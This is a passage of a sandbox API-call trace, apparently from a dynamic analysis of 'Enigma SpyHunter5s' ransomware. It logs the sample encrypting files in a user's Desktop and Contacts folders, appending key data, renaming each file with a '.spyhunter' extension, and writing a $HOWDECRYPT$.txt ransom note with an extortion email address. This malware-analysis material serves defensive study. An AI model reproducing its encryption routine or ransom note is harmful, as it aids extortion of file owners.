K6IMBhDZVM-bN1n.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9xy k6imbhdzvm-bn1n.png.spyhunter")) returned 1 [0149.807] GetProcessHeap () returned 0x2c0000 [0149.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.807] GetProcessHeap () returned 0x2c0000 [0149.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.807] GetProcessHeap () returned 0x2c0000 [0149.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08fd8 | out: hHeap=0x2c0000) returned 1 [0149.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edb8 | out: pbBuffer=0x57edb8) returned 1 [0149.807] GetProcessHeap () returned 0x2c0000 [0149.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edb0*=0x30) returned 1 [0149.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3UkTji28.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3uktji28.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.808] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3UkTji28.m4a") returned 54 [0149.808] StrStrW (lpFirst="3UkTji28.m4a", lpSrch=".txt") returned 0x0 [0149.808] GetProcessHeap () returned 0x2c0000 [0149.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.808] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed74*=0x2800, lpOverlapped=0x0) returned 1 [0149.809] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.809] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed74*=0x2800, lpOverlapped=0x0) returned 1 [0149.809] GetProcessHeap () returned 0x2c0000 [0149.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.809] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.809] WriteFile (in: hFile=0x178, lpBuffer=0x57edb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x57edb4*, lpNumberOfBytesWritten=0x57ed74*=0x4, lpOverlapped=0x0) returned 1 [0149.809] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed74*=0x30, lpOverlapped=0x0) returned 1 [0149.809] CloseHandle (hObject=0x178) returned 1 [0149.810] GetProcessHeap () returned 0x2c0000 [0149.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.810] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3UkTji28.m4a.spyhunter") returned 64 [0149.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3UkTji28.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3uktji28.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3UkTji28.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3uktji28.m4a.spyhunter")) returned 1 [0149.812] GetProcessHeap () returned 0x2c0000 [0149.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.812] GetProcessHeap () returned 0x2c0000 [0149.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.812] GetProcessHeap () returned 0x2c0000 [0149.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2110 | out: hHeap=0x2c0000) returned 1 [0149.813] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edb8 | out: pbBuffer=0x57edb8) returned 1 [0149.813] GetProcessHeap () returned 0x2c0000 [0149.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57edb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57edb0*=0x30) returned 1 [0149.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Mx9kavAnOXks1PgoB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-mx9kavanoxks1pgob.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Mx9kavAnOXks1PgoB.csv") returned 64 [0149.813] StrStrW (lpFirst="-Mx9kavAnOXks1PgoB.csv", lpSrch=".txt") returned 0x0 [0149.813] GetProcessHeap () returned 0x2c0000 [0149.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.813] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed74*=0x2214, lpOverlapped=0x0) returned 1 [0149.814] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffddec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.814] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2214, lpNumberOfBytesWritten=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed74*=0x2214, lpOverlapped=0x0) returned 1 [0149.814] GetProcessHeap () returned 0x2c0000 [0149.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.814] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.815] WriteFile (in: hFile=0x178, lpBuffer=0x57edb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x57edb4*, lpNumberOfBytesWritten=0x57ed74*=0x4, lpOverlapped=0x0) returned 1 [0149.815] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed74*=0x30, lpOverlapped=0x0) returned 1 [0149.815] CloseHandle (hObject=0x178) returned 1 [0149.815] GetProcessHeap () returned 0x2c0000 [0149.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.815] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Mx9kavAnOXks1PgoB.csv.spyhunter") returned 74 [0149.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Mx9kavAnOXks1PgoB.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-mx9kavanoxks1pgob.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-Mx9kavAnOXks1PgoB.csv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-mx9kavanoxks1pgob.csv.spyhunter")) returned 1 [0149.816] GetProcessHeap () returned 0x2c0000 [0149.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.816] GetProcessHeap () returned 0x2c0000 [0149.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.816] GetProcessHeap () returned 0x2c0000 [0149.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08f08 | out: hHeap=0x2c0000) returned 1 [0149.816] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edb0 | out: pbBuffer=0x57edb0) returned 1 [0149.816] GetProcessHeap () returned 0x2c0000 [0149.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eda8*=0x30) returned 1 [0149.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.817] GetProcessHeap () returned 0x2c0000 [0149.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.817] GetProcessHeap () returned 0x2c0000 [0149.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33dfc0 | out: hHeap=0x2c0000) returned 1 [0149.817] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57edb0 | out: pbBuffer=0x57edb0) returned 1 [0149.817] GetProcessHeap () returned 0x2c0000 [0149.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.817] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eda8*=0x30) returned 1 [0149.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.817] GetProcessHeap () returned 0x2c0000 [0149.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.817] GetProcessHeap () returned 0x2c0000 [0149.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a9a8 | out: hHeap=0x2c0000) returned 1 [0149.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.818] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.818] WriteFile (in: hFile=0x178, lpBuffer=0x57ecdf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ee08, lpOverlapped=0x0 | out: lpBuffer=0x57ecdf*, lpNumberOfBytesWritten=0x57ee08*=0x127, lpOverlapped=0x0) returned 1 [0149.819] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.819] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ee08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ee08*=0x2ac, lpOverlapped=0x0) returned 1 [0149.819] CloseHandle (hObject=0x178) returned 1 [0149.819] GetProcessHeap () returned 0x2c0000 [0149.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2caf8 | out: hHeap=0x2c0000) returned 1 [0149.819] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eda8 | out: pbBuffer=0x57eda8) returned 1 [0149.820] GetProcessHeap () returned 0x2c0000 [0149.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.820] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eda0*=0x30) returned 1 [0149.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0149.820] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch=".txt") returned 0x0 [0149.820] GetProcessHeap () returned 0x2c0000 [0149.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.820] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed64*=0x494, lpOverlapped=0x0) returned 1 [0149.823] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.823] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x494, lpNumberOfBytesWritten=0x57ed64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed64*=0x494, lpOverlapped=0x0) returned 1 [0149.823] GetProcessHeap () returned 0x2c0000 [0149.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.823] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.823] WriteFile (in: hFile=0x178, lpBuffer=0x57eda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed64, lpOverlapped=0x0 | out: lpBuffer=0x57eda4*, lpNumberOfBytesWritten=0x57ed64*=0x4, lpOverlapped=0x0) returned 1 [0149.823] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed64*=0x30, lpOverlapped=0x0) returned 1 [0149.823] CloseHandle (hObject=0x178) returned 1 [0149.823] GetProcessHeap () returned 0x2c0000 [0149.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.823] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.spyhunter") returned 74 [0149.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.spyhunter")) returned 1 [0149.824] GetProcessHeap () returned 0x2c0000 [0149.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.824] GetProcessHeap () returned 0x2c0000 [0149.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.824] GetProcessHeap () returned 0x2c0000 [0149.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08e38 | out: hHeap=0x2c0000) returned 1 [0149.824] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eda0 | out: pbBuffer=0x57eda0) returned 1 [0149.824] GetProcessHeap () returned 0x2c0000 [0149.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.825] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed98*=0x30) returned 1 [0149.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.825] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0149.825] StrStrW (lpFirst="lulcit amkdfe.contact", lpSrch=".txt") returned 0x0 [0149.825] GetProcessHeap () returned 0x2c0000 [0149.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.825] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed5c*=0x496, lpOverlapped=0x0) returned 1 [0149.849] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.849] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed5c*=0x496, lpOverlapped=0x0) returned 1 [0149.866] GetProcessHeap () returned 0x2c0000 [0149.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.866] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.866] WriteFile (in: hFile=0x178, lpBuffer=0x57ed9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x57ed9c*, lpNumberOfBytesWritten=0x57ed5c*=0x4, lpOverlapped=0x0) returned 1 [0149.867] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed5c*=0x30, lpOverlapped=0x0) returned 1 [0149.867] CloseHandle (hObject=0x178) returned 1 [0149.867] GetProcessHeap () returned 0x2c0000 [0149.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.867] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.spyhunter") returned 74 [0149.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.spyhunter")) returned 1 [0149.867] GetProcessHeap () returned 0x2c0000 [0149.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.867] GetProcessHeap () returned 0x2c0000 [0149.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0149.868] GetProcessHeap () returned 0x2c0000 [0149.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08d68 | out: hHeap=0x2c0000) returned 1 [0149.868] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eda0 | out: pbBuffer=0x57eda0) returned 1 [0149.868] GetProcessHeap () returned 0x2c0000 [0149.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0149.868] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed98*=0x30) returned 1 [0149.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.868] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0149.868] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch=".txt") returned 0x0 [0149.868] GetProcessHeap () returned 0x2c0000 [0149.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.868] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed5c*=0x49a, lpOverlapped=0x0) returned 1 [0150.107] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.107] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed5c*=0x49a, lpOverlapped=0x0) returned 1 [0150.108] GetProcessHeap () returned 0x2c0000 [0150.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0150.108] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.108] WriteFile (in: hFile=0x178, lpBuffer=0x57ed9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x57ed9c*, lpNumberOfBytesWritten=0x57ed5c*=0x4, lpOverlapped=0x0) returned 1 [0150.108] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed5c*=0x30, lpOverlapped=0x0) returned 1 [0150.108] CloseHandle (hObject=0x178) returned 1 [0150.108] GetProcessHeap () returned 0x2c0000 [0150.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0150.108] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.spyhunter") returned 76 [0150.108] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.spyhunter")) returned 1 [0150.109] GetProcessHeap () returned 0x2c0000 [0150.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0150.109] GetProcessHeap () returned 0x2c0000 [0150.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.109] GetProcessHeap () returned 0x2c0000 [0150.109] 